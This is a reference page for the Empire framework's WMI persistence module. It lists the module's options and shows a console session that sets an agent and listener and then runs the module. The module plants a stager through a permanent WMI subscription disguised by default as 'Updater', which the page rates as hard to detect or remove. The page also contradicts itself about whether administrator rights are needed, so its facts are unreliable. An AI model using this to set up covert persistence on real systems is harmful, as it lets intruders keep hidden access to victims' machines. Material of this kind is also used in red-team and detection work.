Invoke-WMI - Empire Module


This page contains detailed information about how to use the powershell/persistence/elevated/wmi Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview


Name: Invoke-WMI
Module: powershell/persistence/elevated/wmi
Source code [1]: empire/server/modules/powershell/persistence/elevated/wmi.yaml
Source code [2]: empire/server/modules/powershell/persistence/elevated/wmi.py
MITRE ATT&CK: T1047
Language: PowerShell
Needs admin: Yes
OPSEC safe: No
Background: No

The wmi module persists a stager (or script) using a permanent WMI subscription. This has a difficult detection/removal rating.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the wmi module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options


This is a list of options that are required by the wmi module:

Agent
Agent to run module on.

Listener
Listener to use.

SubName
Name to use for the event subscription.
Default value: Updater.

Additional Module Options


This is a list of additional options that are supported by the wmi module:

AtStartup
Switch. Trigger script (within 5 minutes) of system startup.
Default value: True.

Cleanup
Switch. Cleanup the trigger and any script from specified location.

DailyTime
Daily time to trigger the script (HH:mm).

ExtFile
Use an external file for the payload instead of a stager.

FailedLogon
Trigger script with a failed logon attempt from a specified user.

Proxy
Proxy to use for request (default, none, or other).
Default value: default.

ProxyCreds
Proxy credentials ([domain\]username:password) to use for request (default, none, or other).
Default value: default.

UserAgent
User-agent string to use for the staging request (default, none, or other).
Default value: default.

Wmi Example Usage


Here's an example of how to use the wmi module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/elevated/wmi

 Author       @mattifestation                                                        
              @harmj0y                                                               
              @jbooz1                                                                
 Background   False                                                                  
 Comments     https://github.com/mattifestation/PowerSploit/blob/master/Persistence/ 
              Persistence.psm1                                                       
 Description  Persist a stager (or script) using a permanent WMI subscription. This  
              has a difficult detection/removal rating.                              
 Language     powershell                                                             
 Name         powershell/persistence/elevated/wmi                                    
 NeedsAdmin   True                                                                   
 OpsecSafe    False                                                                  
 Techniques   http://attack.mitre.org/techniques/T1047                               


,Record Options---------,----------,-------------------------------------,
| Name        | Value   | Required | Description                         |
|-------------|---------|----------|-------------------------------------|
| Agent       |         | True     | Agent to run module on.             |
|-------------|---------|----------|-------------------------------------|
| AtStartup   | True    | False    | Switch. Trigger script (within 5    |
|             |         |          | minutes) of system startup.         |
|-------------|---------|----------|-------------------------------------|
| Cleanup     |         | False    | Switch. Cleanup the trigger and any |
|             |         |          | script from specified location.     |
|-------------|---------|----------|-------------------------------------|
| DailyTime   |         | False    | Daily time to trigger the script    |
|             |         |          | (HH:mm).                            |
|-------------|---------|----------|-------------------------------------|
| ExtFile     |         | False    | Use an external file for the        |
|             |         |          | payload instead of a stager.        |
|-------------|---------|----------|-------------------------------------|
| FailedLogon |         | False    | Trigger script with a failed logon  |
|             |         |          | attempt from a specified user       |
|-------------|---------|----------|-------------------------------------|
| Listener    |         | True     | Listener to use.                    |
|-------------|---------|----------|-------------------------------------|
| Proxy       | default | False    | Proxy to use for request (default,  |
|             |         |          | none, or other).                    |
|-------------|---------|----------|-------------------------------------|
| ProxyCreds  | default | False    | Proxy credentials                   |
|             |         |          | ([domain\]username:password) to use |
|             |         |          | for request (default, none, or      |
|             |         |          | other).                             |
|-------------|---------|----------|-------------------------------------|
| SubName     | Updater | True     | Name to use for the event           |
|             |         |          | subscription.                       |
|-------------|---------|----------|-------------------------------------|
| UserAgent   | default | False    | User-agent string to use for the    |
|             |         |          | staging request (default, none, or  |
|             |         |          | other).                             |
'-------------'---------'----------'-------------------------------------'

(Empire: usemodule/powershell/persistence/elevated/wmi) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/elevated/wmi) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/powershell/persistence/elevated/wmi) > set SubName Updater
[*] Set SubName to Updater
(Empire: usemodule/powershell/persistence/elevated/wmi) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Authors


References


See Also


Check also the following modules related to this module:

Version


This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.